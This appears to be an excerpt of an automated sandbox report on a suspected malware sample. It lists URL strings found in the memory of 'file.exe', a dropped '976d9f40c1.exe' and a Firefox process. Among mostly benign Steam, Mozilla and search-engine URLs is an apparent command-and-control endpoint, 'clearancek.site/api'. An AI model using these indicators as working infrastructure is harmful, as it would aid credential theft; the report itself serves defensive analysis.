Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3040743134.00000137A91A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3033463599.00000137A91A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3040743134.00000137A91A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3033463599.00000137A91A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A699D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000019.00000002.3196543245.000001379E0DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3104800276.00000137A0167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3112035242.00000137A02B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3063328605.00000137A026C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3101120989.00000137A02B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3151834654.0000002E4B5D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3228149459.00000137A02B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3084260888.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.st_
Source: file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dBNx
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/api
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apii
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: file.exe, 00000000.00000003.2167545129.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=e
Source: file.exe, 00000000.00000003.2167545129.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: file.exe, 00000000.00000003.2167545129.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921571137.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
